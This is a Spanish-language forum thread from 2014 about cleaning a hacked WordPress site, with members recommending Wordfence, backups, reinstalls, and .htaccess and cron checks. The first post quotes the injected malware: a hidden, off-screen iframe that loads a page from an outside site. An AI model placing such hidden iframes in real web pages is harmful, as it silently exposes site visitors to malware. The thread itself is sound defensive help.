Cómo eliminar virus en WordPress

carloparty · 9 May 2014

Buenas acaba de mandarme un email google de que tengo una inyección de código malicioso.

El caso es qui desde el ordenador si me detecta el virus (google chrome) y no puedo acceder a mi area de administración. Desde el Ipad si puedo.

Este es el código malicioso:

<iframe style="position:absolute;top:-999em;left:-999em;" scrolling="no" src="http://itcwebdesign.co.uk/php/project/4/928690939.htm">

Alguien puede saber como solucionarlo ?

Alguna ayuda?

Ederson · 9 May 2014

Que tal! te recomiendo actualizar tu versión de Wordpress y probar instalando el plugin de wordfence Security.
Anteriormente ya se habia tenido este problema por aquí en el foro, prueba con eso.

Emanuel Andrei · 9 May 2014

Hola [MENTION=80233]carloparty[/MENTION]

Reinstala tu wp y ponte el wordfence security como bien ha dicho nuestro compañero Ederson. Si sigues teniendo problemas, nos avisas. :encouragement:

Daniel Muñoz · 9 May 2014

Editar desde el ftp el archivo infectado y borra ese código. Luego actualiza tu wp.

Con eso bastará.

Nota. No estaría mal indagar pir donde entraron para hacer eso.

Enviado desde mi GT-I8190L mediante Tapatalk

carloparty · 9 May 2014

Ya tengo la última versión de wordpress...y tengo instalado el wordfence security. Sin embargo no se como he de actuar.

Wordfence security me detecta un montón de paginas con walware pero no sé como corregirlo...

Emanuel Andrei · 9 May 2014

Solucion rapida: Reemplaza los archivos infectado con unos nuevos.
Solucion lenta: Busca dentro de cada archivo infectado, la inyección que tiene y borralo. :encouragement:

carloparty · 9 May 2014

cómo puedo reemplazar los archivos infectados por un nuevo??????

---------- Post agregado el 09-may-2014 hora: 08:47 ----------

Ahora ya no me deja entrar ni en mi area privada

Emanuel Andrei · 9 May 2014

carloparty dijo:
cómo puedo reemplazar los archivos infectados por un nuevo??????

---------- Post agregado el 09-may-2014 hora: 08:47 ----------

Ahora ya no me deja entrar ni en mi area privada

No tienes ningun backup echo, ni nada?!

7:

carloparty · 9 May 2014

Si. tengo uno de hace una semana pero creo que ya tenía el problema de infección...creo...

Emanuel Andrei · 9 May 2014

carloparty dijo:
Si. tengo uno de hace una semana pero creo que ya tenía el problema de infección...creo...

Sube los archivos que estan infectados desde ese backup por filezilla y nos cuentas :encouragement:

Diegovip · 9 May 2014

La semana pasada tuve yo una infección en wordpress en una web que hice, me entraron en diferentes archivos y añadieron código y al igual que tu Google me puso en su blacklist.

Miré en el FTP los archivos recién modificados y busque algún código que no fuera mío, acabaron poniendolo en el header.php, footer.php y index.php, tras eso y con la herramienta para webmaster de Google solicité una revisión y al día siguiente la web ya estaba accesible.

Te recomiendo hacer esto buscar el código y eliminarlo, siempre con una copia de seguridad.

jonay · 9 May 2014

Si tu theme es descargado de alguna página, y los plugins que utilizas también, yo bajaria la carpeta uploads de wordpress y eliminaria todo el ftp, subiria el wordpress de nuevo totalmente limpio e instalaría uno a uno los plugins y el theme que utilizabas, lo conectas a la db donde tienes los posts y resubes la carpeta uploads de wordpress en su sitio y listo.

Normalmente solo infectan archivos del theme, pero a veces me he encontrado archivos del propio wordpress modificados o incluso plugins modificados.

Para que esto no te vuelva a suceder cambia las contraseñas de todo, incluido el admin, ftp, etc... manten wordpress actualizado nada mas salir una nueva versión y los plugins también, asegurate de que los plugins sean seguros (si no tienes los conocimientos para hacer esto, por lo menso mira la puntuación del plugin, si tiene 5 estrellas y se actualiza frecuentemente muy probablemente sea seguro).

Si después de todo esto te sigue saliendo infectado en google chrome, el código iframe puede que esté en la base de datos y ya deberías editarla y buscar donde está insertado. :encouragement:

carloparty · 9 May 2014

Miles de gracia,me sigue sin funcionar, estoy perdidisimo, a ver si resuelvo con calma y filosofia, gracias por vuestra ayuda desinteresada.

ramonjosegn · 9 May 2014

carloparty dijo:
Miles de gracia,me sigue sin funcionar, estoy perdidisimo, a ver si resuelvo con calma y filosofia, gracias por vuestra ayuda desinteresada.

Hola, lo primero que te recomiendo es que te calmes, porque a veces por querer hacer las cosas rápido con el desespero la fastidias aún más (me pasó una vez que hasta reinstalé un sitio web y luego me acordé que siempre le digo a los usuarios de forobeta que lo primero que deben revisar es su archivo htaccess y precisamente es el que se me había dañado...)

- Primero - intenta conseguir una copia de seguridad, tu hosting debe tener alguna
- 2 - aunque limpies tu sitio web Google no te borra de la lista negra de forma inmediata
- 3 - revisa el sitio web con esta página para asegurarte de si vas por buen camino ( https://www.virustotal.com/es/ - escoges opción URL claro)
- 4 - elimina tu archivo htaccess por si estuviera infectado, para recrearlos te vas a la opción de links permanentes y le das a guardar (si no te atreves salta este paso por ahora)
- 5 - instala el PLUGIN WORDFENCE
- 6 - Una vez instalado Wordfence te vas a "Wordfence - options" y LA ZONA DE Scans to include ACTIVA TODO
- 7 - Una vez terminado el escáner Wordfence te va a decir que hay archivos corruptos, los vas reparando (como no reconoce el español a veces dice que archivos .txt están dañados, no hagas mucho caso)
- 8 - Si estás usando un theme de pago borra el que tengas subido por FTP y subes uno nuevo
- 9 - Revisa vía FTP que los archivos que hay en el servidor no sean de origen desconocido (puedes pedir al hosting que te echen una mano con eso)
- 10 - Revisa desde el cpanel que no tengas NADA EN LA SECCIÓN CRON JOBS ACTIVADO, a veces algunos plugins les da por meter cosas ahí, pero puedes borrar todas las tareas con seguridad

Puede que te falte alguna cosa por revisar, pero siguiendo esos pasos habrás eliminado los orígenes más probables

---------- Post agregado el 09-may-2014 hora: 10:30 ----------

EmiLL dijo:
Solucion rapida: Reemplaza los archivos infectado con unos nuevos.
Solucion lenta: Busca dentro de cada archivo infectado, la inyección que tiene y borralo. :encouragement:

Wordfence lo hace de forma automática sólo hay que escoger las opciones adecuadas para el escaneo y luego darle a "fix"

root78 · 9 May 2014

1) Lo primero de todo es saber si TU máquina local está infectada ya que, en ocasiones, la infección reside como un daemon en el pc local con acceso al ftp y aunque modifiques los archivos se resuben otra vez con el iframe. Así que, pasa un antivirus decente (Kaspersky, bitdefender,avira,...). Si no, prueba con combofix, siempre me ha dado buenos resultados.

2) Para ir más rápido y, asegurado el paso 1, exporta tu base de datos y guarda la carpeta wp-content en un zip. Instala un WP de nuevo, descomprime wp-content y sube solamente la carpeta uploads. Te recomiendo que instales limpios todos los plugins que tenías, por si acaso, aunque este tipo de ataques suelen ser sencillos.

**Antes de exportar la DB, asegúrate que eres el único admin de wordpress y no existe ningún otro usuario con los mismos privilegios.

3) Actualiza. En este tipo de ataques, wordpress debería estar ok de nuevo. Wordfence es un plugin potente y recomendable, pero no el único dado su consumo de recursos. Dos alternativas más: wp better security y el BPS (un poco más complicado). Lo vulnerable que sea el server de tu hosting también cuenta.

**Acuérdate de instalar un plugin backup (a local, dropbox, etc...) y activar el cron para que lo haga automático. Pero, eso sí, la primera copia que quede salvada en un disco duro o un usb externo.

4) Si sigue igual, la inyección de código, como te han comentado, radica en la base de datos. Hay que realizar una consulta con algún trozo común de la cadena que llama el iframe para poder eliminar sin cargarte nada.

ramonjosegn · 9 May 2014

Bueno [MENTION=2268]root78[/MENTION] en las últimas actualizaciones han estado trabajando en el tema de consumos de memoria, además que ahora trabaja en la nube antes de que los ataques alcancen el servidor, yo realmente lo recomiendo, he probado otros y la verdad es que son una coladera, cometen errores garrafales ridículos, de hecho Wordfence en su día también los cometieron (como el día que alguien creó una cuenta de administrador, cambió todas mis páginas y ni me enteré... por supuesto los de Wordfence se llevaron su tirón de orejas)

---------- Post agregado el 09-may-2014 hora: 10:58 ----------

aparte puede escanear y limpiar el sitio y ya luego verá si opta por otro plugin de seguridad, una buena opción muy sencilla es BRUTEPROTECT (tan sencilla que ya han anunciado que será de pago)

---------- Post agregado el 09-may-2014 hora: 11:03 ----------

carloparty dijo:
Buenas acaba de mandarme un email google de que tengo una inyección de código malicioso.

?

Por cierto deja la URL porfi con eso te podemos indicar si sigue dando error en otras máquinas

root78 · 9 May 2014

Gracias por la info, [MENTION=1576]ramonjosegn[/MENTION] . Tendré que volver a testear el wordfence para ver en qué momento se hace la consulta externa por si hay demora en pagespeed/pingdom/gtmetrix. De hecho, Akismet también trabaja así y 0 problemas para el tema spam.

carloparty · 9 May 2014

Lo primero daros las gracias por la ayuda prestrada. A todos

consegui solucionarlo y parece que google ya me lanza visitas. (Hace 2 horas)

Sin embargo, no me da tantas como antes...es esto normal? He estado comparando estas dos horas con otros días normales y he perdido entre el 40-60% de gente que entraba al blog...Se necesitan días par coger el ritmo que llevaba??

ramonjosegn · 9 May 2014

carloparty dijo:
Lo primero daros las gracias por la ayuda prestrada. A todos

consegui solucionarlo y parece que google ya me lanza visitas. (Hace 2 horas)

Sin embargo, no me da tantas como antes...es esto normal? He estado comparando estas dos horas con otros días normales y he perdido entre el 40-60% de gente que entraba al blog...Se necesitan días par coger el ritmo que llevaba??

Sí es normal, en unos 4 días se estabiliza, siempre que haces cambios drásticos -de plantilla, bloqueos, sitio en mantenimiento, etc- Google te resta visitas por unos días... a veces no es más de una semana, si el sitio ha estado offline demasiado tiempo pueden ser varias semanas...

Por cierto ¿cómo lo solucionaste?

carloparty · 10 May 2014

A si ....perdonar. Lo primero que hize fue llamar a mi hosting para decirles lomque me habia ocurrido...lanzaron un javascript que localizó un archivo jqary que lanzaba unas llamadas extrañas. Me recomendaron tambien quitar el plugin Duplicator porque hacía cosas extrañas.

Despues contrate un servicio anual que me limpio todo el codigo malicioso. Ademas ellos mismos se encargaron de eliminar todo el malware y comunicó a google que me quitaran de la blacklist.... Hacia las 1,5-2,5h mi web ya estaba funcionando.